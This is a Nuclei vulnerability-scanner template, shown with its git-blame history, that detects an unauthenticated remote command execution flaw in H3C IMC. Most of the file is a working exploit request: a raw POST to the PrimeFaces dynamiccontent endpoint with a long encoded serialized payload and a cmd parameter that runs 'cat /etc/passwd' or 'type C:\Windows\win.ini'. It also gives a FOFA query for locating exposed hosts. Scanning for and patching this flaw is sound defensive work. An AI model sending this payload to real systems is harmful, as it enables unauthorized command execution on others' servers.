nuclei-templates/vulnerabilities/other/h3c-imc-rce.yaml

id: h3c-imc-rce

info:
  name: H3c IMC RCE
  author: pikpikcu
  severity: critical
  description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint
  reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw
  tags: rce,h3c-imc
  metadata:
    fofa-query: 'body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"'

requests:
  - raw:
      - |
        POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd={{command}}

    payloads:
      command:
        - 'cat /etc/passwd'
        - 'type C:\\Windows\\win.ini'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200
Create h3c-imc-rce.yaml 2021-05-31 05:53:21 +00:00			`id: h3c-imc-rce`

			`info:`
Fix name 2021-10-14 13:06:20 +00:00			`name: H3c IMC RCE`
Create h3c-imc-rce.yaml 2021-05-31 05:53:21 +00:00			`author: pikpikcu`
			`severity: critical`
Spelling 2021-10-14 13:07:39 +00:00			`description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint`
Create h3c-imc-rce.yaml 2021-05-31 05:53:21 +00:00			`reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw`
			`tags: rce,h3c-imc`
Fixed h3c-imc-rce.yaml (#3401) * Fixed h3c-imc-rce.yaml * Update h3c-imc-rce.yaml * Additional payload for windows Co-authored-by: niudai <niudai@zp857s-mbp.local> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-23 14:53:42 +00:00			`metadata:`
			`fofa-query: 'body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"'`
Create h3c-imc-rce.yaml 2021-05-31 05:53:21 +00:00
			`requests:`
Fixed h3c-imc-rce.yaml (#3401) * Fixed h3c-imc-rce.yaml * Update h3c-imc-rce.yaml * Additional payload for windows Co-authored-by: niudai <niudai@zp857s-mbp.local> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-23 14:53:42 +00:00			`- raw:`
			`- \|`
			`POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
Create h3c-imc-rce.yaml 2021-05-31 05:53:21 +00:00
Fixed h3c-imc-rce.yaml (#3401) * Fixed h3c-imc-rce.yaml * Update h3c-imc-rce.yaml * Additional payload for windows Co-authored-by: niudai <niudai@zp857s-mbp.local> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-23 14:53:42 +00:00			pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd={{command}}

			`payloads:`
			`command:`
			`- 'cat /etc/passwd'`
			`- 'type C:\\Windows\\win.ini'`

			`stop-at-first-match: true`
Create h3c-imc-rce.yaml 2021-05-31 05:53:21 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: regex`
Fixed h3c-imc-rce.yaml (#3401) * Fixed h3c-imc-rce.yaml * Update h3c-imc-rce.yaml * Additional payload for windows Co-authored-by: niudai <niudai@zp857s-mbp.local> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-23 14:53:42 +00:00			`part: body`
Create h3c-imc-rce.yaml 2021-05-31 05:53:21 +00:00			`regex:`
Fixed h3c-imc-rce.yaml (#3401) * Fixed h3c-imc-rce.yaml * Update h3c-imc-rce.yaml * Additional payload for windows Co-authored-by: niudai <niudai@zp857s-mbp.local> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-23 14:53:42 +00:00			`- "root:.*:0:0:"`
			`- "\\[(font\|extension\|file)s\\]"`
			`condition: or`
Create h3c-imc-rce.yaml 2021-05-31 05:53:21 +00:00
			`- type: status`
			`status:`
			`- 200`